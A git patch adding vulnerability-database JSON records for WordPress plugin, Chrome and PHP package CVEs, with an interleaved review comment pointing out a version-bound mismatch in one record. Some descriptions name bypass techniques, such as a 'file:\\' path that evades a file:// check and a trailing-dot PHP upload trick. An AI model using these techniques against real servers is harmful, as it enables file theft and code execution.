From c8af25628af4a788b0d61a4c1a290276949fb509 Mon Sep 17 00:00:00 2001 From: Weston Steimel Date: Thu, 19 Dec 2024 09:30:13 +0000 Subject: [PATCH] updates 2024-12-19 
Signed-off-by: Weston Steimel --- data/anchore/2024/CVE-2024-10892.json | 44 ++++++++++++++++ data/anchore/2024/CVE-2024-11254.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-11291.json | 45 +++++++++++++++++ data/anchore/2024/CVE-2024-11295.json | 45 +++++++++++++++++ data/anchore/2024/CVE-2024-12061.json | 45 +++++++++++++++++ data/anchore/2024/CVE-2024-12259.json | 47 +++++++++++++++++ data/anchore/2024/CVE-2024-12432.json | 45 +++++++++++++++++ data/anchore/2024/CVE-2024-12596.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-12692.json | 41 +++++++++++++++ data/anchore/2024/CVE-2024-12693.json | 41 +++++++++++++++ data/anchore/2024/CVE-2024-12694.json | 41 +++++++++++++++ data/anchore/2024/CVE-2024-12695.json | 41 +++++++++++++++ data/anchore/2024/CVE-2024-21546.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-21547.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-45338.json | 73 +++++++++++++++++++++++++++ data/anchore/2024/CVE-2024-49363.json | 43 ++++++++++++++++ data/anchore/2024/CVE-2024-52579.json | 43 ++++++++++++++++ data/anchore/2024/CVE-2024-52590.json | 43 ++++++++++++++++ data/anchore/2024/CVE-2024-52591.json | 43 ++++++++++++++++ data/anchore/2024/CVE-2024-52592.json | 43 ++++++++++++++++ data/anchore/2024/CVE-2024-52593.json | 43 ++++++++++++++++ data/anchore/2024/CVE-2024-53269.json | 56 ++++++++++++++++++++ data/anchore/2024/CVE-2024-53270.json | 62 +++++++++++++++++++++++ data/anchore/2024/CVE-2024-53271.json | 50 ++++++++++++++++++ data/anchore/2024/CVE-2024-54265.json | 9 +++- data/anchore/2024/CVE-2024-54266.json | 9 +++- data/anchore/2024/CVE-2024-54267.json | 9 +++- data/anchore/2024/CVE-2024-54268.json | 9 +++- data/anchore/2024/CVE-2024-54289.json | 7 ++- data/anchore/2024/CVE-2024-54298.json | 9 +++- data/anchore/2024/CVE-2024-54323.json | 9 +++- data/anchore/2024/CVE-2024-54326.json | 9 +++- data/anchore/2024/CVE-2024-55603.json | 50 ++++++++++++++++++ data/anchore/2024/CVE-2024-55952.json | 45 
+++++++++++++++++ data/anchore/2024/CVE-2024-55953.json | 45 +++++++++++++++++ data/anchore/2024/CVE-2024-55985.json | 44 ++++++++++++++++ data/anchore/2024/CVE-2024-56047.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56048.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56049.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56050.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56051.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56052.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56053.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56054.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56055.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56057.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56128.json | 53 +++++++++++++++++++ data/anchore/2024/CVE-2024-56145.json | 51 +++++++++++++++++++ 48 files changed, 1921 insertions(+), 15 deletions(-) create mode 100644 data/anchore/2024/CVE-2024-10892.json create mode 100644 data/anchore/2024/CVE-2024-11254.json create mode 100644 data/anchore/2024/CVE-2024-11291.json create mode 100644 data/anchore/2024/CVE-2024-11295.json create mode 100644 data/anchore/2024/CVE-2024-12061.json create mode 100644 data/anchore/2024/CVE-2024-12259.json create mode 100644 data/anchore/2024/CVE-2024-12432.json create mode 100644 data/anchore/2024/CVE-2024-12596.json create mode 100644 data/anchore/2024/CVE-2024-12692.json create mode 100644 data/anchore/2024/CVE-2024-12693.json create mode 100644 data/anchore/2024/CVE-2024-12694.json create mode 100644 data/anchore/2024/CVE-2024-12695.json create mode 100644 data/anchore/2024/CVE-2024-21546.json create mode 100644 data/anchore/2024/CVE-2024-21547.json create mode 100644 data/anchore/2024/CVE-2024-45338.json create mode 100644 data/anchore/2024/CVE-2024-49363.json create mode 100644 data/anchore/2024/CVE-2024-52579.json create mode 100644 data/anchore/2024/CVE-2024-52590.json create mode 100644 
data/anchore/2024/CVE-2024-52591.json create mode 100644 data/anchore/2024/CVE-2024-52592.json create mode 100644 data/anchore/2024/CVE-2024-52593.json create mode 100644 data/anchore/2024/CVE-2024-53269.json create mode 100644 data/anchore/2024/CVE-2024-53270.json create mode 100644 data/anchore/2024/CVE-2024-53271.json create mode 100644 data/anchore/2024/CVE-2024-55603.json create mode 100644 data/anchore/2024/CVE-2024-55952.json create mode 100644 data/anchore/2024/CVE-2024-55953.json create mode 100644 data/anchore/2024/CVE-2024-55985.json create mode 100644 data/anchore/2024/CVE-2024-56047.json create mode 100644 data/anchore/2024/CVE-2024-56048.json create mode 100644 data/anchore/2024/CVE-2024-56049.json create mode 100644 data/anchore/2024/CVE-2024-56050.json create mode 100644 data/anchore/2024/CVE-2024-56051.json create mode 100644 data/anchore/2024/CVE-2024-56052.json create mode 100644 data/anchore/2024/CVE-2024-56053.json create mode 100644 data/anchore/2024/CVE-2024-56054.json create mode 100644 data/anchore/2024/CVE-2024-56055.json create mode 100644 data/anchore/2024/CVE-2024-56057.json create mode 100644 data/anchore/2024/CVE-2024-56128.json create mode 100644 data/anchore/2024/CVE-2024-56145.json diff --git a/data/anchore/2024/CVE-2024-10892.json b/data/anchore/2024/CVE-2024-10892.json new file mode 100644 index 00000000..96c65e6b --- /dev/null +++ b/data/anchore/2024/CVE-2024-10892.json 
@@ -0,0 +1,44 @@ +{ + "additionalMetadata": { + "cna": "wpscan", + "cveId": "CVE-2024-10892", + "description": "The Cost Calculator Builder WordPress plugin before 3.2.43 does not have CSRF checks in some AJAX actions, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://wpscan.com/vulnerability/ff1f5b84-a8cf-4574-a713-53d35739c6cb/" + ], + "upstream": { + "datePublished": "2024-12-18T06:00:16.137Z", + "dateReserved": "2024-11-05T18:26:45.843Z", + "dateUpdated": "2024-12-18T15:10:31.241Z", + "digest": "700fe76bcb6d55b03d99e6fc03f0917852942b346a69f9827a3c408f48140b48" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:stylemixthemes:cost_calculator_builder:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "cost-calculator-builder", + "packageType": "wordpress-plugin", + "product": "Cost Calculator Builder", + "repo": "https://plugins.svn.wordpress.org/cost-calculator-builder", + "vendor": "stylemixthemes", + "versions": [ + { + "lessThan": "3.2.43", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-11254.json b/data/anchore/2024/CVE-2024-11254.json new file mode 100644 index 00000000..a7c3caf8 --- /dev/null +++ b/data/anchore/2024/CVE-2024-11254.json 
@@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "wordfence", + "cveId": "CVE-2024-11254", + "description": "The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the disqus_name parameter in all versions up to, and including, 1.1.1 due to insufficient input validation. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.0.93/includes/disqus.html?rev=3024147#L34", + "https://www.wordfence.com/threat-intel/vulnerabilities/id/5da82149-c827-4574-8269-b2b798edca59?source=cve" + ], + "upstream": { + "datePublished": "2024-12-18T03:22:05.525Z", + "dateReserved": "2024-11-15T10:03:40.779Z", + "dateUpdated": "2024-12-18T16:35:04.395Z", + "digest": "beb572e898580c52c899b149f913c269b1bf8fe885ee055e13688927b8136f56" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:ampforwp:accelerated_mobile_pages:*:*:*:*:*:wordpress:*:*", + "cpe:2.3:a:magazine3:amp_for_wp:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "accelerated-mobile-pages", + "packageType": "wordpress-plugin", + "product": "AMP for WP – Accelerated Mobile Pages", + "repo": "https://plugins.svn.wordpress.org/accelerated-mobile-pages", + "vendor": "mohammed_kaludi", + "versions": [ + { + "lessThan": "1.1.2", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-11291.json b/data/anchore/2024/CVE-2024-11291.json new file mode 100644 index 00000000..10863adc 
--- /dev/null +++ b/data/anchore/2024/CVE-2024-11291.json @@ -0,0 +1,45 @@ +{ + "additionalMetadata": { + "cna": "wordfence", + "cveId": "CVE-2024-11291", + "description": "The Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.13.4 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://plugins.trac.wordpress.org/changeset/3206206/paid-member-subscriptions", + "https://www.wordfence.com/threat-intel/vulnerabilities/id/e207f1a3-2ca5-46d1-91a9-89652451266c?source=cve" + ], + "upstream": { + "datePublished": "2024-12-18T11:09:31.646Z", + "dateReserved": "2024-11-15T21:37:54.832Z", + "dateUpdated": "2024-12-18T16:29:54.185Z", + "digest": "80d42db5428bd90c7210fc77c735642e09f9101659e8566d2fb9bea37c6221b8" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:cozmoslabs:membership_\\&_content_restriction_-_paid_member_subscriptions:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "paid-member-subscriptions", + "packageType": "wordpress-plugin", + "product": "Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction", + "repo": "https://plugins.svn.wordpress.org/paid-member-subscriptions", + "vendor": "madalinungureanu", + "versions": [ + { + "lessThan": "2.13.5", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file 
diff --git a/data/anchore/2024/CVE-2024-11295.json b/data/anchore/2024/CVE-2024-11295.json new file mode 100644 index 00000000..b059fe86 --- /dev/null +++ b/data/anchore/2024/CVE-2024-11295.json @@ -0,0 +1,45 @@ +{ + "additionalMetadata": { + "cna": "wordfence", + "cveId": "CVE-2024-11295", + "description": "The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.29 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://plugins.trac.wordpress.org/changeset/3205648/simple-page-access-restriction", + "https://www.wordfence.com/threat-intel/vulnerabilities/id/ed92806e-5d75-4a23-a588-821e9ada1b32?source=cve" + ], + "upstream": { + "datePublished": "2024-12-18T07:02:46.168Z", + "dateReserved": "2024-11-15T23:54:25.258Z", + "dateUpdated": "2024-12-18T16:33:27.786Z", + "digest": "b2dbbc3642edb147de02aa0790a9b92c951ed47a6f373f6c38e0827f333abe6c" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:pluginsandsnippets:simple_page_access_restriction:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "simple-page-access-restriction", + "packageType": "wordpress-plugin", + "product": "Simple Page Access Restriction", + "repo": "https://plugins.svn.wordpress.org/simple-page-access-restriction", + "vendor": "pluginsandsnippets", + "versions": [ + { + "lessThan": "1.0.30", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file 
diff --git a/data/anchore/2024/CVE-2024-12061.json b/data/anchore/2024/CVE-2024-12061.json new file mode 100644 index 00000000..6ced5a91 --- /dev/null +++ b/data/anchore/2024/CVE-2024-12061.json 
@@ -0,0 +1,45 @@ +{ + "additionalMetadata": { + "cna": "wordfence", + "cveId": "CVE-2024-12061", + "description": "The Events Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.3 via the naevents_elementor_template shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3208546%40events-addon-for-elementor&new=3208546%40events-addon-for-elementor&sfp_email=&sfph_mail=", + "https://www.wordfence.com/threat-intel/vulnerabilities/id/f59d9d8a-467a-4920-963a-da45f1f4462f?source=cve" + ], + "upstream": { + "datePublished": "2024-12-18T03:22:07.346Z", + "dateReserved": "2024-12-02T20:40:21.531Z", + "dateUpdated": "2024-12-18T16:33:59.336Z", + "digest": "d6d2201b0a475b98bec6bc22ce4766d82dea737618099ca04f29d44d654f62c6" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:nicheaddons:events_addon_for_elementor:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "events-addon-for-elementor", + "packageType": "wordpress-plugin", + "product": "Events Addon for Elementor", + "repo": "https://plugins.svn.wordpress.org/events-addon-for-elementor", + "vendor": "nicheaddons", + "versions": [ + { + "lessThan": "2.2.4", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file 
diff --git a/data/anchore/2024/CVE-2024-12259.json b/data/anchore/2024/CVE-2024-12259.json new file mode 100644 index 00000000..564c4838 --- /dev/null +++ b/data/anchore/2024/CVE-2024-12259.json 
@@ -0,0 +1,47 @@
+{
+ "additionalMetadata": {
+ "cna": "wordfence",
+ "cveId": "CVE-2024-12259",
+ "description": "The CRM WordPress Plugin – RepairBuddy plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.8120. This is due to the plugin not properly validating a user's identity prior to updating their email through the wc_update_user_data AJAX action. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3204501%40computer-repair-shop&new=3204501%40computer-repair-shop&sfp_email=&sfph_mail=",
+ "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3206568%40computer-repair-shop&new=3206568%40computer-repair-shop&sfp_email=&sfph_mail=#file548",
+ "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3208270%40computer-repair-shop&new=3208270%40computer-repair-shop&sfp_email=&sfph_mail=",
+ "https://www.wordfence.com/threat-intel/vulnerabilities/id/80997d2f-3e16-48f6-969b-58844cb83d53?source=cve"
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T03:22:05.906Z",
+ "dateReserved": "2024-12-05T16:30:27.926Z",
+ "dateUpdated": "2024-12-18T16:34:53.057Z",
+ "digest": "f91e0fa51e7614fe2a4b1ea446545a2f0430fead300e1f15946bd867e0a86eff"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://wordpress.org/plugins",
+ "cpes": [
+ "cpe:2.3:a:webfulcreations:computer_repair_shop:*:*:*:*:*:wordpress:*:*"
+ ],
+ "packageName": "computer-repair-shop",
+ "packageType": "wordpress-plugin",
+ "product": "CRM WordPress Plugin – RepairBuddy",
+ "repo": "https://plugins.svn.wordpress.org/computer-repair-shop",
+ "vendor": "sweetdaisy86",
+ "versions": [
+ {
+ "lessThan": "3.8122",
+ "status": "affected",
+ "version": "0",
+ "versionType": "semver"
+ }
+ ]
+ }
+ ],
+ "providerMetadata": {
+ "orgId": "00000000-0000-4000-8000-000000000000",
+ "shortName": "anchoreadp"
+ }
+ }
+}
\ No newline at end of file
diff --git a/data/anchore/2024/CVE-2024-12432.json b/data/anchore/2024/CVE-2024-12432.json
new file mode 100644
index 00000000..a211bf84
--- /dev/null
+++ b/data/anchore/2024/CVE-2024-12432.json
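Review bot: In CVE-2024-12259.json the `versions` entry uses `"lessThan": "3.8122"`, but the description in the same record says the flaw affects versions up to and including 3.8120, so 3.8121 is marked affected without anything in the record explaining why. If the fix only became complete in a later changeset (three changesets are referenced) the bound may be intentional; otherwise `"lessThan": "3.8121"` would match the description. Separately, `3.8122` has only two components and is not a valid SemVer string, so `"versionType": "custom"` may be the safer label for consumers that parse `semver` ranges strictly.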
@@ -0,0 +1,45 @@ +{ + "additionalMetadata": { + "cna": "wordfence", + "cveId": "CVE-2024-12432", + "description": "The WPC Shop as a Customer for WooCommerce plugin for WordPress is vulnerable to account takeover and privilege escalation in all versions up to, and including, 1.2.8. This is due to the 'generate_key' function not producing a sufficiently random value. This makes it possible for authenticated attackers, with Subscriber-level access and above, to log in as site administrators, granted they have triggered the ajax_login() function which generates a unique key that can be used to log in.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3208130%40wpc-shop-as-customer&new=3208130%40wpc-shop-as-customer&sfp_email=&sfph_mail=", + "https://www.wordfence.com/threat-intel/vulnerabilities/id/048625e8-10b7-418d-a13b-329f1d7e0171?source=cve" + ], + "upstream": { + "datePublished": "2024-12-18T03:22:00.850Z", + "dateReserved": "2024-12-10T17:11:11.238Z", + "dateUpdated": "2024-12-18T16:35:53.912Z", + "digest": "b98d5c7bd9e5c0609f97ec1cfc0dbedd5de4308ea3403df8d7467987c04defd2" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:wpclever:wpc_shop_as_a_customer_for_woocommerce:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "wpc-shop-as-customer", + "packageType": "wordpress-plugin", + "product": "WPC Shop as a Customer for WooCommerce", + "repo": "https://plugins.svn.wordpress.org/wpc-shop-as-customer", + "vendor": "wpclever", + "versions": [ + { + "lessThan": "1.2.9", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file 
diff --git a/data/anchore/2024/CVE-2024-12596.json b/data/anchore/2024/CVE-2024-12596.json new file mode 100644 index 00000000..9d697915 --- /dev/null +++ b/data/anchore/2024/CVE-2024-12596.json 
@@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "wordfence", + "cveId": "CVE-2024-12596", + "description": "The LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes plugin for WordPress is vulnerable to arbitrary post deletion due to a missing capability check on the 'llms_delete_cert' action in all versions up to, and including, 7.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://plugins.trac.wordpress.org/changeset/3208662/lifterlms/trunk/includes/abstracts/llms-abstract-controller-user-engagements.php", + "https://plugins.trac.wordpress.org/changeset/3208662/lifterlms/trunk/includes/controllers/class.llms.controller.certificates.php", + "https://www.wordfence.com/threat-intel/vulnerabilities/id/8e75a03b-7552-4228-a4d0-13c78d20f6d5?source=cve" + ], + "upstream": { + "datePublished": "2024-12-18T03:22:06.256Z", + "dateReserved": "2024-12-12T22:14:08.110Z", + "dateUpdated": "2024-12-18T16:34:43.867Z", + "digest": "9cb9f3bc8b21efdda84c1a41d383e0125061f2051d407e49bf20c0c13499de24" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:lifterlms:lifterlms:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "lifterlms", + "packageType": "wordpress-plugin", + "product": "LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes", + "repo": "https://plugins.svn.wordpress.org/lifterlms", + "vendor": "chrisbadgett", + "versions": [ + { + "lessThan": "7.8.6", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-12692.json b/data/anchore/2024/CVE-2024-12692.json new file mode 100644 index 00000000..8e066edd 
--- /dev/null +++ b/data/anchore/2024/CVE-2024-12692.json @@ -0,0 +1,41 @@ +{ + "additionalMetadata": { + "cna": "chrome", + "cveId": "CVE-2024-12692", + "description": "Type Confusion in V8 in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop_18.html", + "https://issues.chromium.org/issues/382291459" + ], + "upstream": { + "datePublished": "2024-12-18T21:42:56.456Z", + "dateReserved": "2024-12-16T21:02:50.722Z", + "dateUpdated": "2024-12-18T21:42:56.456Z", + "digest": "894d81daddd9073ea4982b4bd66fa06044a00d617176f8ac175a8f9fc8b83e60" + } + }, + "adp": { + "affected": [ + { + "cpes": [ + "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*" + ], + "product": "Chrome", + "vendor": "Google", + "versions": [ + { + "lessThan": "131.0.6778.204", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-12693.json b/data/anchore/2024/CVE-2024-12693.json new file mode 100644 index 00000000..a77250f0 --- /dev/null +++ b/data/anchore/2024/CVE-2024-12693.json 
@@ -0,0 +1,41 @@ +{ + "additionalMetadata": { + "cna": "chrome", + "cveId": "CVE-2024-12693", + "description": "Out of bounds memory access in V8 in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop_18.html", + "https://issues.chromium.org/issues/382190919" + ], + "upstream": { + "datePublished": "2024-12-18T21:42:56.781Z", + "dateReserved": "2024-12-16T21:02:50.941Z", + "dateUpdated": "2024-12-18T21:42:56.781Z", + "digest": "894d81daddd9073ea4982b4bd66fa06044a00d617176f8ac175a8f9fc8b83e60" + } + }, + "adp": { + "affected": [ + { + "cpes": [ + "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*" + ], + "product": "Chrome", + "vendor": "Google", + "versions": [ + { + "lessThan": "131.0.6778.204", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-12694.json b/data/anchore/2024/CVE-2024-12694.json new file mode 100644 index 00000000..1f19b7f9 --- /dev/null +++ b/data/anchore/2024/CVE-2024-12694.json 
@@ -0,0 +1,41 @@ +{ + "additionalMetadata": { + "cna": "chrome", + "cveId": "CVE-2024-12694", + "description": "Use after free in Compositing in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop_18.html", + "https://issues.chromium.org/issues/368222741" + ], + "upstream": { + "datePublished": "2024-12-18T21:42:56.986Z", + "dateReserved": "2024-12-16T21:02:51.195Z", + "dateUpdated": "2024-12-18T21:42:56.986Z", + "digest": "894d81daddd9073ea4982b4bd66fa06044a00d617176f8ac175a8f9fc8b83e60" + } + }, + "adp": { + "affected": [ + { + "cpes": [ + "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*" + ], + "product": "Chrome", + "vendor": "Google", + "versions": [ + { + "lessThan": "131.0.6778.204", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-12695.json b/data/anchore/2024/CVE-2024-12695.json new file mode 100644 index 00000000..d749342e --- /dev/null +++ b/data/anchore/2024/CVE-2024-12695.json 
@@ -0,0 +1,41 @@ +{ + "additionalMetadata": { + "cna": "chrome", + "cveId": "CVE-2024-12695", + "description": "Out of bounds write in V8 in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop_18.html", + "https://issues.chromium.org/issues/383647255" + ], + "upstream": { + "datePublished": "2024-12-18T21:42:57.172Z", + "dateReserved": "2024-12-16T21:02:51.317Z", + "dateUpdated": "2024-12-18T21:42:57.172Z", + "digest": "894d81daddd9073ea4982b4bd66fa06044a00d617176f8ac175a8f9fc8b83e60" + } + }, + "adp": { + "affected": [ + { + "cpes": [ + "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*" + ], + "product": "Chrome", + "vendor": "Google", + "versions": [ + { + "lessThan": "131.0.6778.204", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-21546.json b/data/anchore/2024/CVE-2024-21546.json new file mode 100644 index 00000000..bd726d32 --- /dev/null +++ b/data/anchore/2024/CVE-2024-21546.json 
@@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "snyk", + "cveId": "CVE-2024-21546", + "description": "Versions of the package unisharp/laravel-filemanager before 2.9.1 are vulnerable to Remote Code Execution (RCE) through using a valid mimetype and inserting the . character after the php file extension. This allows the attacker to execute malicious code.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca", + "https://github.com/UniSharp/laravel-filemanager/commit/8170760c0ae316d77b9363cd4c76ab68d3f63f0b", + "https://security.snyk.io/vuln/SNYK-PHP-UNISHARPLARAVELFILEMANAGER-7210316" + ], + "upstream": { + "datePublished": "2024-12-18T06:06:02.529Z", + "dateReserved": "2023-12-22T12:33:20.128Z", + "dateUpdated": "2024-12-18T06:06:02.529Z", + "digest": "132e8191004638dd59caabac2de03a2940657c27a7a0ea0fc48d766a7501001f" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://packagist.org", + "cpes": [ + "cpe:2.3:a:unisharp:laravel-filemanager:*:*:*:*:*:php:*:*" + ], + "packageName": "unisharp/laravel-filemanager", + "packageType": "php-composer", + "product": "unisharp/laravel-filemanager", + "repo": "https://github.com/UniSharp/laravel-filemanager", + "vendor": "unisharp", + "versions": [ + { + "lessThan": "2.9.1", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-21547.json b/data/anchore/2024/CVE-2024-21547.json new file mode 100644 index 00000000..f0fb71de --- /dev/null +++ b/data/anchore/2024/CVE-2024-21547.json 
@@ -0,0 +1,46 @@
+{
+ "additionalMetadata": {
+ "cna": "snyk",
+ "cveId": "CVE-2024-21547",
+ "description": "Versions of the package spatie/browsershot before 5.0.2 are vulnerable to Directory Traversal due to URI normalisation in the browser where the file:// check can be bypassed with file:\\\\. An attacker could read any file on the server by exploiting the normalization of \\ into /.",
+ "reason": "Added CPE configurations because not yet analyzed by NVD.",
+ "references": [
+ "https://gist.github.com/chuajianshen/baa71db588cfc038fb5d65624a47be81",
+ "https://github.com/spatie/browsershot/commit/dfc3635b83dd980e5c39f8f8c73e87723b99ca01",
+ "https://security.snyk.io/vuln/SNYK-PHP-SPATIEBROWSERSHOT-8501858"
+ ],
+ "upstream": {
+ "datePublished": "2024-12-18T06:06:04.591Z",
+ "dateReserved": "2023-12-22T12:33:20.128Z",
+ "dateUpdated": "2024-12-18T14:44:23.335Z",
+ "digest": "907c053b4d27cb919fa9a9914ca3359d721e96915d10744fa27c52d1bbf9857e"
+ }
+ },
+ "adp": {
+ "affected": [
+ {
+ "collectionURL": "https://packagist.org",
+ "cpes": [
